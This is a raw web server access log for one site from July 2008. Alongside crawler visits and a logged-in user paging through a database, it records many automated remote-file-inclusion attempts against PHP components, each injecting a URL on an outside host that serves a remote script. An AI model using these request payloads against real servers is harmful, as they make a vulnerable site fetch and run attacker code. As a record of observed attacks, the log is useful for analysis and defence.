208.76.203.217 - - [13/Jul/2008:09:51:21 -0700] "GET /logs/!scanhttp://realbori.com/bbs/dosiris.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.76.203.217 - - [13/Jul/2008:09:51:21 -0700] "GET /!scanhttp://realbori.com/bbs/dosiris.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.221.143.111 - - [13/Jul/2008:09:51:27 -0700] "GET /logs//main.php?sayfa=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.221.143.111 - - [13/Jul/2008:09:51:28 -0700] "GET //main.php?sayfa=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.70.36.107 - - [13/Jul/2008:09:51:31 -0700] "GET /logs/access_080207.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.coronaclub.it/pk_gallery/photos/25/11828333/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.211.19 - - [13/Jul/2008:09:51:33 -0700] "GET /bikes/cb750K6/?M=A HTTP/1.1" 200 1626 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
194.79.75.195 - - [13/Jul/2008:09:52:07 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.geocities.com/elsiavaria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
195.70.36.107 - - [13/Jul/2008:09:52:08 -0700] "GET /logs/access_080104.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.coronaclub.it/pk_gallery/photos/25/11828333/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.79.75.195 - - [13/Jul/2008:09:52:09 -0700] "GET //appserv/main.php?appserv_root=http://www.geocities.com/elsiavaria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
198.88.236.235 - - [13/Jul/2008:09:52:12 -0700] "GET /plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
198.88.236.235 - - [13/Jul/2008:09:52:12 -0700] "GET /plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
198.88.236.235 - - [13/Jul/2008:09:52:14 -0700] "GET /plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.70.36.107 - - [13/Jul/2008:09:52:23 -0700] "GET /logs/access_080118.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.coronaclub.it/pk_gallery/photos/25/11828333/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [13/Jul/2008:09:54:32 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [13/Jul/2008:09:54:32 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [13/Jul/2008:09:54:32 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [13/Jul/2008:09:54:33 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.70.36.107 - - [13/Jul/2008:09:54:37 -0700] "GET /logs/access_080218.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.coronaclub.it/pk_gallery/photos/25/11828333/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.151.102.50 - - [13/Jul/2008:09:55:15 -0700] "GET /logs/index.php?redir=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.25.195.68 - - [13/Jul/2008:09:55:18 -0700] "GET /logs/access_080207.log/errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.25.195.68 - - [13/Jul/2008:09:55:18 -0700] "GET /logs/errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.25.195.68 - - [13/Jul/2008:09:55:18 -0700] "GET /errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.151.102.50 - - [13/Jul/2008:09:55:20 -0700] "GET /index.php?redir=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 200 18411 "-" "libwww-perl/5.805" "www.dmulk.com"
209.25.195.68 - - [13/Jul/2008:09:55:23 -0700] "GET /logs/access_080207.log/errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.25.195.68 - - [13/Jul/2008:09:55:23 -0700] "GET /errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.25.195.68 - - [13/Jul/2008:09:55:23 -0700] "GET /logs/errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.6.18.246 - - [13/Jul/2008:09:55:31 -0700] "GET /minamijewelry/html/testimonials.html HTTP/1.0" 200 12445 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
209.25.195.68 - - [13/Jul/2008:09:55:33 -0700] "GET /logs/access_080315.log/errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.25.195.68 - - [13/Jul/2008:09:55:34 -0700] "GET /logs/access_080315.log/errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.25.195.68 - - [13/Jul/2008:09:55:36 -0700] "GET /logs/errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.25.195.68 - - [13/Jul/2008:09:55:36 -0700] "GET /logs/access_080207.log/errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.25.195.68 - - [13/Jul/2008:09:55:36 -0700] "GET /errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.25.195.68 - - [13/Jul/2008:09:55:42 -0700] "GET /logs/access_080315.log/errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.102.132 - - [13/Jul/2008:09:56:53 -0700] "GET //appserv/main.php?appserv_root=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
70.85.102.132 - - [13/Jul/2008:09:56:53 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
76.174.75.83 - - [13/Jul/2008:09:57:31 -0700] "GET /warboard/ HTTP/1.1" 401 395 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)" "www.dmulk.com"
76.174.75.83 - warboard [13/Jul/2008:09:57:40 -0700] "GET /warboard/ HTTP/1.1" 200 32998 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)" "www.dmulk.com"
76.174.75.83 - warboard [13/Jul/2008:09:57:41 -0700] "GET /warboard/css/styles_screen.css HTTP/1.1" 200 5617 "http://www.dmulk.com/warboard/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)" "www.dmulk.com"
76.174.75.83 - warboard [13/Jul/2008:09:57:41 -0700] "GET /warboard/css/styles_print.css HTTP/1.1" 200 962 "http://www.dmulk.com/warboard/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)" "www.dmulk.com"
76.174.75.83 - warboard [13/Jul/2008:09:57:41 -0700] "GET /warboard/include/htmlarea/editor.js HTTP/1.1" 200 46443 "http://www.dmulk.com/warboard/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)" "www.dmulk.com"
76.174.75.83 - warboard [13/Jul/2008:09:57:41 -0700] "GET /warboard/images/update.gif HTTP/1.1" 200 245 "http://www.dmulk.com/warboard/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)" "www.dmulk.com"
76.174.75.83 - warboard [13/Jul/2008:09:57:41 -0700] "GET /warboard/images/details.gif HTTP/1.1" 200 215 "http://www.dmulk.com/warboard/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)" "www.dmulk.com"
76.174.75.83 - warboard [13/Jul/2008:09:57:41 -0700] "GET /warboard/images/delete.gif HTTP/1.1" 200 213 "http://www.dmulk.com/warboard/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)" "www.dmulk.com"
76.174.75.83 - - [13/Jul/2008:09:57:42 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)" "www.dmulk.com"
76.174.75.83 - - [13/Jul/2008:09:57:43 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Google Desktop)" "www.dmulk.com"
208.76.203.217 - - [13/Jul/2008:09:57:52 -0700] "GET /!scanhttp://realbori.com/bbs/dosiris.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.174.75.83 - warboard [13/Jul/2008:09:57:53 -0700] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=2&order=dataid&order_type=ASC HTTP/1.1" 200 32977 "http://www.dmulk.com/warboard/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)" "www.dmulk.com"
196.202.144.245 - - [13/Jul/2008:09:57:57 -0700] "GET /logs/index2.php?inject%20http://www.thelostknightsguild.com/tmp/t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
196.202.144.245 - - [13/Jul/2008:09:57:57 -0700] "GET /index2.php?inject%20http://www.thelostknightsguild.com/tmp/t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
76.174.75.83 - warboard [13/Jul/2008:09:57:59 -0700] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=8&order=dataid&order_type=ASC HTTP/1.1" 200 33143 "http://www.dmulk.com/warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=2&order=dataid&order_type=ASC" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)" "www.dmulk.com"
76.174.75.83 - warboard [13/Jul/2008:09:58:02 -0700] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=9&order=dataid&order_type=ASC HTTP/1.1" 200 32942 "http://www.dmulk.com/warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=8&order=dataid&order_type=ASC" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)" "www.dmulk.com"
76.174.75.83 - warboard [13/Jul/2008:09:58:05 -0700] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=10&order=dataid&order_type=ASC HTTP/1.1" 200 33092 "http://www.dmulk.com/warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=9&order=dataid&order_type=ASC" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)" "www.dmulk.com"
76.174.75.83 - warboard [13/Jul/2008:09:58:08 -0700] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=13&order=dataid&order_type=ASC HTTP/1.1" 200 33049 "http://www.dmulk.com/warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=10&order=dataid&order_type=ASC" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)" "www.dmulk.com"
76.174.75.83 - warboard [13/Jul/2008:09:58:25 -0700] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=14&order=dataid&order_type=ASC HTTP/1.1" 200 32892 "http://www.dmulk.com/warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=13&order=dataid&order_type=ASC" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)" "www.dmulk.com"
76.174.75.83 - warboard [13/Jul/2008:09:58:41 -0700] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=15&order=dataid&order_type=ASC HTTP/1.1" 200 33085 "http://www.dmulk.com/warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=14&order=dataid&order_type=ASC" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)" "www.dmulk.com"
76.174.75.83 - warboard [13/Jul/2008:09:58:51 -0700] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=13&order=dataid&order_type=ASC HTTP/1.1" 200 33049 "http://www.dmulk.com/warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=15&order=dataid&order_type=ASC" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)" "www.dmulk.com"
195.70.36.107 - - [13/Jul/2008:09:58:52 -0700] "GET /logs/access_080207.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.coronaclub.it/pk_gallery/photos/25/11828333/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.70.36.107 - - [13/Jul/2008:09:58:53 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.coronaclub.it/pk_gallery/photos/25/11828333/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.70.36.107 - - [13/Jul/2008:09:58:53 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.coronaclub.it/pk_gallery/photos/25/11828333/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.117 - - [13/Jul/2008:09:59:00 -0700] "GET /logs/access_080218.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://h1.ripway.com/cmdid/idvscan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.117 - - [13/Jul/2008:09:59:00 -0700] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://h1.ripway.com/cmdid/idvscan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.117 - - [13/Jul/2008:09:59:01 -0700] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://h1.ripway.com/cmdid/idvscan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.70.36.107 - - [13/Jul/2008:09:59:01 -0700] "GET /logs/access_080103.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.coronaclub.it/pk_gallery/photos/25/11828333/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.174.75.83 - warboard [13/Jul/2008:09:59:05 -0700] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=12&order=dataid&order_type=ASC HTTP/1.1" 200 33198 "http://www.dmulk.com/warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=13&order=dataid&order_type=ASC" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)" "www.dmulk.com"
76.174.75.83 - warboard [13/Jul/2008:09:59:11 -0700] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=15&order=dataid&order_type=ASC HTTP/1.1" 200 33085 "http://www.dmulk.com/warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=12&order=dataid&order_type=ASC" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)" "www.dmulk.com"
76.174.75.83 - warboard [13/Jul/2008:09:59:19 -0700] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=16&order=dataid&order_type=ASC HTTP/1.1" 200 33207 "http://www.dmulk.com/warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=15&order=dataid&order_type=ASC" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)" "www.dmulk.com"
85.25.149.45 - - [13/Jul/2008:09:59:28 -0700] "GET /logs/access_080329.log//claroline/phpbb/page_tail.php?includePath=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.149.45 - - [13/Jul/2008:09:59:28 -0700] "GET //claroline/phpbb/page_tail.php?includePath=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.149.45 - - [13/Jul/2008:09:59:28 -0700] "GET /logs//claroline/phpbb/page_tail.php?includePath=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.174.75.83 - warboard [13/Jul/2008:09:59:31 -0700] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=17&order=dataid&order_type=ASC HTTP/1.1" 200 33296 "http://www.dmulk.com/warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=16&order=dataid&order_type=ASC" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)" "www.dmulk.com"
76.174.75.83 - warboard [13/Jul/2008:09:59:39 -0700] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=18&order=dataid&order_type=ASC HTTP/1.1" 200 33255 "http://www.dmulk.com/warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=17&order=dataid&order_type=ASC" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)" "www.dmulk.com"
76.174.75.83 - warboard [13/Jul/2008:09:59:46 -0700] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=19&order=dataid&order_type=ASC HTTP/1.1" 200 33279 "http://www.dmulk.com/warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=18&order=dataid&order_type=ASC" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)" "www.dmulk.com"
194.79.75.195 - - [13/Jul/2008:09:59:48 -0700] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/sofiawila/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
76.174.75.83 - warboard [13/Jul/2008:09:59:58 -0700] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=20&order=dataid&order_type=ASC HTTP/1.1" 200 33094 "http://www.dmulk.com/warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=19&order=dataid&order_type=ASC" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)" "www.dmulk.com"
76.174.75.83 - warboard [13/Jul/2008:10:00:06 -0700] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=21&order=dataid&order_type=ASC HTTP/1.1" 200 32985 "http://www.dmulk.com/warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=20&order=dataid&order_type=ASC" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)" "www.dmulk.com"
76.174.75.83 - warboard [13/Jul/2008:10:00:11 -0700] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=22&order=dataid&order_type=ASC HTTP/1.1" 200 32850 "http://www.dmulk.com/warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=21&order=dataid&order_type=ASC" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)" "www.dmulk.com"
76.174.75.83 - warboard [13/Jul/2008:10:00:20 -0700] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=23&order=dataid&order_type=ASC HTTP/1.1" 200 32840 "http://www.dmulk.com/warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=22&order=dataid&order_type=ASC" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)" "www.dmulk.com"
76.174.75.83 - warboard [13/Jul/2008:10:00:25 -0700] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=24&order=dataid&order_type=ASC HTTP/1.1" 200 32995 "http://www.dmulk.com/warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=23&order=dataid&order_type=ASC" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)" "www.dmulk.com"
76.174.75.83 - warboard [13/Jul/2008:10:00:41 -0700] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=25&order=dataid&order_type=ASC HTTP/1.1" 200 33002 "http://www.dmulk.com/warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=24&order=dataid&order_type=ASC" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)" "www.dmulk.com"
76.174.75.83 - warboard [13/Jul/2008:10:00:53 -0700] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=26&order=dataid&order_type=ASC HTTP/1.1" 200 32858 "http://www.dmulk.com/warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=25&order=dataid&order_type=ASC" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)" "www.dmulk.com"
76.174.75.83 - warboard [13/Jul/2008:10:01:02 -0700] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=0&order=dataid&order_type=ASC HTTP/1.1" 200 32998 "http://www.dmulk.com/warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=26&order=dataid&order_type=ASC" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)" "www.dmulk.com"
194.79.75.195 - - [13/Jul/2008:10:01:03 -0700] "GET /logs/access_080313.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/sofiawila/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
76.174.75.83 - warboard [13/Jul/2008:10:01:14 -0700] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=1&order=dataid&order_type=ASC HTTP/1.1" 200 32994 "http://www.dmulk.com/warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=0&order=dataid&order_type=ASC" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)" "www.dmulk.com"
208.75.225.10 - - [13/Jul/2008:10:01:24 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://keycell.webs.com/IDscan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.55.211.40 - - [13/Jul/2008:10:01:25 -0700] "GET /bikes/dteel/?M=A HTTP/1.1" 200 9656 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
76.174.75.83 - warboard [13/Jul/2008:10:01:26 -0700] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=2&order=dataid&order_type=ASC HTTP/1.1" 200 32977 "http://www.dmulk.com/warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=1&order=dataid&order_type=ASC" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)" "www.dmulk.com"
